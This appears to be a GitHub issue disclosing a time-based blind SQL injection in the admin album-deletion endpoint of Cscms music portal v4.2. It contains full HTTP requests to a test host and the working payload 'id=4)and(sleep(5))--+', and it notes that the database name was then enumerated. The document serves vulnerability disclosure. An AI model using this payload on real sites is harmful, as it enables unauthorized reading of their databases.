SQL injection vulnerability exists in Cscms music portal system v4.2

#### Details 

There is a SQL blind injection vulnerability in pic_Type.php_del

Add an album after the administrator logs in

![image](https://user-images.githubusercontent.com/96719328/163907563-1bae677a-eaec-4df0-9502-1ac08f53bca2.png)

```
POST /admin.php/pic/admin/type/save HTTP/1.1
Host: cscms.test
Content-Length: 166
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/pic/admin/type/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=imqi28p17sd90eqcjmumqdtu1bbu7lhg
Connection: close

cid=5&reco=0&addtime=ok&name=1&bname=&pic=&user=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&singer=&skins=show.html&title=&keywords=&description=&id=0&yid=0
```

![image](https://user-images.githubusercontent.com/96719328/163907632-3d8b2b2c-b461-4d25-a8a8-66a112f7e3a0.png)

Delete this album to the recycle bin

![image](https://user-images.githubusercontent.com/96719328/163907723-2aafe849-3833-46cb-a68c-3df8cf49f026.png)

When deleting the album in the recycle bin, construct malicious statements to realize SQL injection

```
POST /admin.php/pic/admin/type/del?yid=3 HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/pic/admin/type?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n7gacaf0cfrdgd78692oaa4f2li036fp
Connection: close

id=4)and(sleep(5))--+
```

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/163907887-4730f308-b834-4539-8b8d-803e61ff9fa8.png)

so construct payload to Blasting database

![image](https://user-images.githubusercontent.com/96719328/163907967-afeae757-7e57-4f8c-950b-db1a3cd7c29f.png)

![image](https://user-images.githubusercontent.com/96719328/163907983-a409019c-6cd0-4e25-b594-72200501b769.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerability exist


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability exists in Cscms music portal system v4.2 #21

Details

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development